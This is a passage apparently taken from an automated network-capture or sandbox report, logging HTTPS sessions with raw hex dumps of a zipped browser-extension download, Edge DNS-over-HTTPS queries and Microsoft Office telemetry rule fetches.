                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc
                                                                                                                                                                                                                                                                                                                    Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5
                                                                                                                                                                                                                                                                                                                    Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51
                                                                                                                                                                                                                                                                                                                    Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13
                                                                                                                                                                                                                                                                                                                    Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7
                                                                                                                                                                                                                                                                                                                    Data Ascii: `cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73
                                                                                                                                                                                                                                                                                                                    Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    59192.168.2.749830172.64.41.34438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    60192.168.2.749831172.64.41.34438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    61192.168.2.749832162.159.61.34438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    62192.168.2.74981313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:42 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 491
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080642Z-174f7845968px8v7hC1EWR08ng0000000wy0000000004840
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    63192.168.2.74981213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:42 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080642Z-174f7845968xr5c2hC1EWRd0hn0000000df0000000007zp5
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    64192.168.2.74981413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:42 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080642Z-174f7845968psccphC1EWRuz9s0000000wug00000000a12t
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    65192.168.2.74981513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:42 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 261fcd2e-101e-005a-5345-40882b000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080642Z-174f7845968j6t2phC1EWRcfe80000000wu00000000057hh
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
